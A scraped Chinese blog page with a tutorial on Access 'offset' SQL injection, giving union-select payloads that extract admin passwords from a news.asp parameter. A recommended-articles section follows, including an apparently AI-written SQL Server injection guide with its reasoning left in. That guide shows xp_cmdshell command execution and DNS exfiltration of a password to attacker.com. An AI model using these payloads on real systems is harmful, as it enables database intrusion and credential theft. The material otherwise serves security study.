access 偏移注入 案例

最新推荐文章于 2024-07-11 14:56:11 发布
原创 最新推荐文章于 2024-07-11 14:56:11 发布 · 1.3k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细解析了一起SQL注入案例,通过偏移注入技术查询管理员表字段数量及字段名,揭示了利用union联合查询进行数据获取的原理,并提供了一种猜测字段名的技巧。 

news.asp?id=3039 and 4>8 union select 1,2,3,4,* from manage_admin as a inner join manage_admin as b on a.id=b.id

看个案例就明白是什么意思了

先是背景

news.asp?id=3306 存在注入

然后通过 order by 可知查询返回 12 列

通过数据表字典跑出管理员表 manage_admin,但是无论如何也跑不出字段名

好,背景介绍完毕


接下来通过 order by 查询manage_admin 一共有多少字段

4返回正常,5返回错误,所以manage_admin 一共有4个字段。

2x4<12 当然等于也可以。

news.asp?id=3039 and 4>8 union select 1,2,3,4,* from manage_admin as a inner join manage_admin as b on a.id=b.id


案例讲完了,来分析一下sql语法,看下图w3school的解释。

as 关键字则是为数据表取别名。

最后利用 union 联合查询获取数据。

这也是偏移注入的原理,可在不知道字段名的情况下查询数据。

ps:这是彩笔的理解,不一定正确。


另外,关于猜解管理员表字段名这里有个技巧,一般与通过后台登录表单的输入框名称同名,本案例中就是这样。

news.asp?id=3039 and 5>9 UNION SELECT 1,userpassword,3,4,5,6,admin,8,9,10,11,12 from manage_admin


纳尼,这就是偏移注入,其实偏移注入也可以用来猜解数据表一共有多少字段。


news.asp?id=3039 and 4>8 union select 1,2,3,4,5,6,7,8,* from manage_admin //返回正常
<pre name="code" class="plain">news.asp?id=3039 and 4>8 union select 1,2,3,4,5,6,7,8,9,* from manage_admin //返回错误




说明表manage_admin 有4个字段(12-8)










                

        

    



  



    



                



	

		

			

				
					
【漏洞扫描】——14、AWVS工程扫描

				
			

			

				

					Fly_鹏程万里
				

				

					03-01
					
					2171
					
				

			

		

		

			
				
本篇文章我们主要介绍AWVS如何对目标网站进行扫描以及如何导出扫描报告。

			
		

	



                

            
              



	

		

			

				
					
access偏移注入

				
			

			

				

					weiliang369的博客
				

				

					02-22
					
					1795
					
				

			

		

		

			
				
access偏移注入

利用情景

1.偏移注入access偏移注入,主要是由于数据库结构的问题,其他数据库没办法利用。

2.用于解决判断出表名,得不到字段的困境。



偏移注入的特点

1.看人品和技巧的注入方法,不是100%能成功(基本上看了我的总结成功率就很高了)。

2.无需管理账号密码字段,直接爆账号密码。

利用条件

1.已知管理表名

2.已知任意字段(一个或多个多个会增加几率)

影响偏移注入成功率的因素

1.管理表的字段数越少越好(最好就三个 1.id 2.账号字段 3.密码字段

			
		

	



              


  
              

                


	

		

			

				
					
Access偏移注入

				
			

			

				

					10-02
				

			

		

		

			
				
Access偏移注入教程 该文章出自『草哲's BLOG』,原文链接:http://www.337479.cn/alias/access-migration-into-the/

			
		

	





	

		

			

				
					
【实战渗透】对 ACCESS 偏移注入实战(针对爆不出字段名)

				
			

			

				

					V1040375575的博客
				

				

					09-08
					
					617
					
				

			

		

		

			
				
ACCESS偏移注入记录



Access偏移注入原理,基本公式为:
order by 出的字段数减去*号的字段数,然而再用order by的字段数减去2倍刚才得出来的答案;
也就是:
orderby = 22
* = 6个字符
2 × * = 12个字符
22 - 12 = 10个字符






注入点:

www.xxx.com/Newsview.asp?id=832



查询字段数:

www.xxx.com/Newsview.asp?id=832order by 16回显正常...

			
		

	



		

			
		



	

		

			

				
					
SQL注入-针对asp+access网站进行SQL注入

				
			

			

				

					qq_25899635的博客
				

				

					05-23
					
					5053
					
				

			

		

		

			
				
asp+access网站技术介绍
  ASP即Active Server Pages,是MicroSoft公司开发的服务器端脚本环境,可用来创建动态交互式网页并建立强大的web应用程序。当服务器收到对ASp文件的请求时,它会处理包含在用于构建发送给浏览器的HTML(Hyper Text Markup Language,超文本标志语言)网页文件中的服务器端脚本代码。除服务器端脚本代码外,ASP文件也...

			
		

	





	

		

			

				
					
WEB攻防-通用漏洞-SQL注入-ACCESS一般注入偏移注入

				
			

			

				

					weixin_45534587的博客
				

				

					07-11
					
					1234
					
				

			

		

		

			
				
同样的使用union select来做,不同的是不需要知道列名,而是通过偏移爆出数据,但前提是查询的表必须比当前查询到的列数小,如该案例在上文中查询到22列,则如果要查询admin表的列数必须比当前查询的22列的列数少,因为要把查询到表塞进当前查询到列中,不理解往下看例子。union select 1,2,3,4,5,6,7,8,9,10,11,admin.* from admin  --回显错误。在偏移6位之后回显正常,则知道admin有6列 ,而3和15是回显位,这里选择使用15回显。

			
		

	





	

		

			

				
					
非标准偏移注入定位术:如何在010 Editor中找到未知位置隐藏数据的3种策略

				
			

			

				

					
				

			

		

		

			
				
# 非标准偏移注入的实战攻防:从隐藏到提取,再到反追踪  在智能家居设备日益复杂的今天,确保无线连接的稳定性已成为一大设计挑战。而就在你家中的智能音箱、摄像头或温控器默默运行时,它们所依赖的固件可能正悄悄...

			
		

	





	

		

			

				
					
access+asp演示

				
			

			

				

					weixin_43607936的博客
				

				

					02-24
					
					615
					
				

			

		

		

			
				
access注入
1,acess数据库介绍
2,access数据库调用分析
3,acess注入原理
4,acess注入工具
1.acess数据库介绍
Microsoft Office access是由微软发布的关系型数据库管理系统。它结合了MicrosoftJetDatabase Engine和图形用户界面两项特点,是Microsoft Office的系统程序之一。
数据库后缀名字  *.mdb
2.access数据库调用分析
连接分析
http://127.0.0.1:99/pro.asp?id=40
找

			
		

	





	

		

			

				
					
利用漏洞注入

				
			

			

				

					m0_71383067的博客
				

				

					06-04
					
					548
					
				

			

		

		

			
				
在计算机安全领域,漏洞注入是一种常见的攻击技术,它利用软件漏洞或安全漏洞来攻击计算机系统。漏洞注入可以用于窃取数据、获取系统权限、破坏系统等各种恶意行为。为了保护计算机系统的安全,渗透测试和漏洞注入已经成为一个必不可少的领域。本文将介绍漏洞注入的基本原理和方法,使用漏洞注入进行攻击的常见技术和工具,以及如何使用漏洞注入来防范攻击。此外,本文还提供了一系列实用的漏洞注入示例,以帮助读者更好地理解和应用这些技术。无论您是一名网络安全专业人员还是一个普通用户,理解漏洞注入的原理和方法都非常重要。

			
		

	





	

		

			

				
					
注入&Sqlmap

				
			

			

				

					DebbieLi_Ca的博客
				

				

					10-25
					
					840
					
				

			

		

		

			
				
中心主题
sqlmap
SQLMap介绍


1.Sqlmap介绍


2.Sqlmap环境安装


3.sqlmap下载

sqlmaap版本查看



sqlmap获取目标


1.sqlmap直连数据库

-d表示直连
–banner 获取banner信息



2.sqlmap URL探测


3.sqlmap文件读取目标

可以探测多个URL



4.sqlmap google批量注入


sqlmap请求参数设置


Sqlmap设置HTTP方法


get和put

POST在请求的时候,服

			
		

	





	

		

			

				
					
Access——偏移注入

				
			

			

				

					qq_45300786的博客
				

				

					07-20
					
					815
					
				

			

		

		

			
				
Access数据库没有系统自带库 =》只能强行猜解。
那有没有种方法,可以不知道字段名就查询数据呢。
这种方法就叫做偏移注入

既然如此我们在使用偏移注入之前要了解一些函数。

可以发现这三个查询语句时等价的,
第一个的 * 号,表示一切东西(表名,字段名)
第二个的*号,表示所有的字段名


直接开始
前面的内容是上一篇的access——cookie的内容,这里我就不多赘述。
判断回显位。
171+union+select+1%2c2%2c3%2c4%2c5%2c6%2c7%2c8%2c9%2c10+fr

			
		

	





	

		

			

				
					
Access注入——偏移注入

				
			

			

				

					MSB_WLAQ的博客
				

				

					09-29
					
					390
					
				

			

		

		

			
				
偏移注入简介



使用场景


一些无法查询的列名,比如权限不足的 知道表名却不知道字段 使用偏移查询主要查询字段及内容等。


使用条件


(1):知道表名(2):注入点的字段数必须要大于查询的字段


常见问题


1 .* 的作用

用于代替表内全部字段,在不能用系统自带库查字段名时。

2.偏移注入是否仅用于Access

不是,mysql也可以使用偏移注入。

3.偏移注释时联合查询后的一张表为什么要小于前一张表

联合查询必须要满足一个条件,就是前面的查询和后面的查询字段数必须相等,因为前.

			
		

	





	

		

			

				
					
Access-偏移注入

				
			

			

				

					weixin_45634365的博客
				

				

					03-02
					
					384
					
				

			

		

		

			
				
在SQL注入的时候会遇到一些无法查询列名的问题,例如系统自带数据库的权限不够而无法访问系统自带库,例如Access根本没有系统自带库,需要强行猜解表名
在猜到表名无法猜到字段名的情况下,可以使用偏移注入来查询表里面的数据
像sqlmap之类的工具实际上是爆破字段的名字,但是如果字段名比较奇怪,sqlmap就无能为力了
偏移注入终比较常用的方法是移位溢注
移位溢注
#假设admin表里面有id、username、password三个字段
#admin.*代表了admin表里所有的字段
select * fro

			
		

	





	

		

			

				
					
Access偏移注入

				
			

			

				

					qq_58000413的博客
				

				

					09-19
					
					399
					
				

			

		

		

			
				
> select  id,username,password,1,2,3,4,5  from  admin   若显错位在3,4位置,则输出password,1。=>select  1,id,username,password,2,3,4,5  from admin        则输出username,password。=>select  1,2,id,username,password,3,4,5  from  admin        则输出id,username。Access数据库排序。

			
		

	





	

		

			

				
					
sqlserver数据库的注入方式

					
最新发布

				
			

			

				

					12-12
				

			

		

		

			
				
<think>嗯,用户这次明确要求了解SQL Server数据库的注入方式,看来是个专注技术细节的安全研究者。之前讨论过Access注入,现在转向SQL Server,需要突出两者差异。用户引用的资料很专业,涉及系统数据库、堆叠注入等概念,说明有一定基础。

从引用内容看,SQL Server的特性确实和Access截然不同:它有完善的系统库(master/model/msdb/tempdb),支持堆叠查询和多语句执行,还能通过系统函数获取丰富信息。这些特性直接决定了注入手法的差异。

在整理回答时,首先要强调核心差异点:SQL Server的堆叠注入能力是Access不具备的王牌技术,配合系统视图和存储过程能实现高阶攻击。引用[2][4][5]提到的系统数据库功能需要拆解清楚——比如master库控制权限,msdb管任务调度,这些都是攻击者感兴趣的入口。

针对技术细节要分层说明:基础部分用联合查询和报错注入作为铺垫,重点展开堆叠注入的实战案例(如xp_cmdshell提权)。用户似乎对系统函数也很关注,@@version、db_name()这些信息泄露函数必须包含。最后防御措施要呼应SQL Server特有的安全机制,比如禁用xp_cmdshell。

用户上次提到的偏移注入在SQL Server里不太适用,这点需要点明。另外考虑设计几个进阶问题:比如如何利用tempdb绕过检测,或者如何通过msdb实现持久化控制,这样能引导用户深入思考。
</think>
以下是SQL Server数据库注入的详细方式及技术要点,结合其与MySQL的差异进行说明:

---

### 一、SQL Server注入核心特性(与MySQL对比)
| **特性**         | **SQL Server**                             | **MySQL**               |
|------------------|--------------------------------------------|-------------------------|
| **注释符**       | `--` 、 `/**/`                             | `#`、`-- `、`/**/`      |
| **系统库**       | `master`/`msdb`/`tempdb`[^3][^5]          | `information_schema`    |
| **元数据查询**   | `sys.tables`/`sys.columns`            | `information_schema.tables` |
| **多语句执行**   | **支持堆叠注入**(`;`分隔)[^2]           | 默认不支持              |
| **系统函数**     | `@@version`、`db_name()`、`@@SERVERNAME`[^4] | `version()`、`database()` |

---

### 二、SQL Server注入主要方式
#### 1. **联合查询注入**
```sql
' UNION SELECT null,@@version,null-- 
```
- **步骤**:
  1. 用`ORDER BY`确定列数  
  2. 通过系统函数获取信息:
     ```sql
     UNION SELECT 1,db_name(),3,@@version FROM master..sysdatabases
     ```
  3. 提取数据:
     ```sql
     UNION SELECT 1,username,password FROM admin-- 
     ```

#### 2. **报错注入**
利用错误信息泄露数据:
```sql
' AND 1=CONVERT(int,@@version)-- 
```
- **常用函数**:
  - `convert()`:类型转换报错
  - `updatexml()`:XML解析报错(需特定版本)

#### 3. **堆叠注入(核心优势)**[^2]
可执行多条SQL语句:
```sql
'; EXEC xp_cmdshell 'whoami';-- 
```
- **利用场景**:
  - 执行系统命令(需开启`xp_cmdshell`)
  - 创建/删除数据库对象
  > *示例提权:启用xp_cmdshell*
  > ```sql
  > '; EXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE;-- 
  > ```

#### 4. **时间盲注**
```sql
'; IF (SELECT ASCII(SUBSTRING(db_name(),1,1)))>100 WAITFOR DELAY '0:0:5'-- 
```
- **特征**:无回显时通过延时判断

#### 5. **系统数据库利用**[^5]
| **系统库**   | **作用**                  | **注入利用方向**               |
|--------------|---------------------------|--------------------------------|
| `master`     | 控制所有系统配置          | 获取用户登录信息、服务器配置   |
| `msdb`       | 存储任务调度/备份历史     | 查询计划任务执行记录           |
| `tempdb`     | 临时对象存储              | 创建临时表绕过过滤             |

---

### 三、高阶利用技巧
1. **权限提升**:
   - 利用存储过程:`xp_cmdshell`、`sp_addsrvrolemember`
   - 通过DLL加载执行代码:`sp_addextendedproc`

2. **数据外带**:
   ```sql
   '; DECLARE @a varchar(8000); SET @a=(SELECT TOP 1 password FROM admin); EXEC('master..xp_dirtree "\\'+@a+'.attacker.com\"');-- 
   ```
   > 通过DNS协议外传数据

3. **绕过过滤**:
   - 双写关键字:`SELSELECTECT`
   - 十六进制编码:`SELECT` → `0x53454C454354`

---

### 四、防御措施
1. **输入过滤**:严格校验参数类型(如数字型用`CAST()`转换)
2. **最小权限**:数据库账户禁用`xp_cmdshell`等危险组件
3. **错误处理**:禁用详细错误回显
4. **参数化查询**:
   ```csharp
   SqlCommand cmd = new SqlCommand("SELECT * FROM users WHERE id=@id");
   cmd.Parameters.Add("@id", SqlDbType.Int).Value = userId;
   ```

---

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

  
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值